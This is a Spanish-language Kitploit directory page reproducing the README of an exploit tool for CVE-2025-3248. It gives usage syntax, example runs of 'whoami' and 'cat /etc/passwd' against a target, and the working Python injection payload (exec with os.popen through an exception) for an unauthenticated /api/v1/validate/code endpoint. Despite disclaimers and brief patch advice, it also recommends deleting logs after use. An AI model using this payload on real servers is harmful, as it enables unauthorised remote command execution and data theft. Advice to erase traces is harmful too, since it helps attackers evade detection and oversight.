Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3248 — Exploit para CVE-2025-3248: inyecta payloads de Python manipulados en un endpoint de código API no autenticado para ejecutar comandos arbitrarios en el servidor objetivo. | Kitploit
Herramientas/GitHubGitHub/12-test-12/cve-2025-3248
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

Exploit para CVE-2025-3248: inyecta payloads de Python manipulados en un endpoint de código API no autenticado para ejecutar comandos arbitrarios en el servidor objetivo.

Ver Repositorio
2hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3248 Documentación de la herramienta de explotación Introducción Esta herramienta se utiliza para explotar la vulnerabilidad CVE-2025-3248 (una vulnerabilidad de inyección de código basada en Python) mediante la construcción de un payload malicioso para lograr la ejecución remota de comandos (RCE) en el servidor objetivo. La vulnerabilidad existe en un endpoint API de una aplicación web, donde un atacante puede inyectar código Python arbitrario a través de un punto de ejecución de código no validado.

Aviso importante: Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas. Las pruebas de penetración no autorizadas pueden violar la ley. Asegúrese de tener autorización explícita para el sistema objetivo.

Características ✅ Inyecta código Python malicioso a través del endpoint /api/v1/validate/code ✅ Soporta la ejecución de comandos arbitrarios del sistema (por ejemplo, whoami, ls, etc.) ✅ Tiempo de espera personalizable (predeterminado 10 segundos) ✅ Soporta dos formatos de salida: texto/JSON ✅ Manejo detallado de errores y salida de registros

Uso Sintaxis básica

root@kitploit:~
python cve-2025-3248.py -t <URL_objetivo> -c "<comando>" [opciones]

Parámetros

ParámetroObligatorioDescripción
-t, --targetSíURL del objetivo (formato: http://ip:puerto)
-c, --commandSíComando del sistema a ejecutar (debe ir entre comillas)
-o, --outputNoFormato de salida (text/json, predeterminado text)
--timeoutNoTiempo de espera de la solicitud (segundos, predeterminado 10)
-v, --verboseNoMuestra registros de ejecución detallados

Ejemplos de uso Ejemplo 1: Ejecutar el comando whoami (formato de salida predeterminado)

root@kitploit:~
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

Salida de ejemplo:

root@kitploit:~
[+] Comando ejecutado exitosamente
--------------------------------------------------
www-data
--------------------------------------------------

Ejemplo 2: Formato de salida JSON + registro detallado

root@kitploit:~
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

Salida de ejemplo:

root@kitploit:~
{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

Breve análisis del principio de la vulnerabilidad

  • El servicio recibe el parámetro code en el endpoint /api/v1/validate/code
  • El lado del servidor no realiza un filtrado de seguridad en la entrada y utiliza directamente exec() para ejecutar el código Python proporcionado
  • El atacante construye un payload especial:
root@kitploit:~
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
    pass
  • A través del mecanismo de manejo de excepciones, se desencadena os.popen() para ejecutar comandos del sistema
  • Riesgo de la vulnerabilidad: puede conducir al control total del servidor; el atacante puede ejecutar cualquier comando del sistema, robar datos sensibles, instalar puertas traseras, etc.

Advertencia de seguridad ⚠️ Esta herramienta está destinada únicamente a pruebas de penetración autorizadas ⚠️

  • Riesgo legal: El uso de esta herramienta para pruebas de penetración sin autorización explícita puede violar leyes como la Ley de Fraude y Abuso Informático.
  • Riesgo del sistema: Ejecutar comandos del sistema puede causar caídas del servicio, pérdida de datos o bloqueo del sistema.
  • Riesgo de detección: Los ataques pueden ser detectados y registrados por cortafuegos, IDS/IPS.

Recomendaciones:

  • Utilice solo en entornos controlados (por ejemplo, laboratorios, entornos de pruebas autorizados)
  • Use preferentemente el parámetro -v para ver registros detallados y evitar operaciones incorrectas
  • Limpie inmediatamente los rastros después de la ejecución (por ejemplo, eliminar registros, cerrar sesiones)

Entorno de dependencias

  • Python 3.7+
  • Biblioteca requests (debe instalarse previamente)
root@kitploit:~
pip install requests

Descripción del manejo de errores

Código de errorCausaSolución
[-] Formato de URL objetivo incorrectoLa URL carece de esquema o hostVerifique el formato de la URL (por ejemplo, http://127.0.0.1:8080)
[-] Tiempo de espera de la solicitudEl objetivo no respondió a tiempoAumente el valor del parámetro --timeout
[-] Error de conexiónEl objetivo no es alcanzable / bloqueado por cortafuegosVerifique la conectividad de red
[-] Fallo en la ejecución del comando. Código de estado HTTP: 403El servidor deniega el permisoConfirme si el servicio objetivo permite la ejecución de código

Detalles técnicos

  • Ubicación de la vulnerabilidad: Endpoint POST /api/v1/validate/code
  • Tipo de vulnerabilidad: Inyección de código (Code Injection)
  • Versiones afectadas: No especificado (el script asume que existe la vulnerabilidad en esa versión)
  • Recomendaciones de parche:
    • Filtrar estrictamente la entrada (prohibir funciones como exec/eval)
    • Ejecutar el código del usuario en un entorno de pruebas (sandbox)
    • Restringir los permisos del endpoint API

Descargo de responsabilidad: Este documento es únicamente para fines de investigación y educación en seguridad. El autor no se hace responsable de ninguna pérdida directa o indirecta causada por el uso de esta herramienta. Asegúrese de cumplir con las leyes y regulaciones y utilizar herramientas de seguridad de manera legal.

Descargar herramienta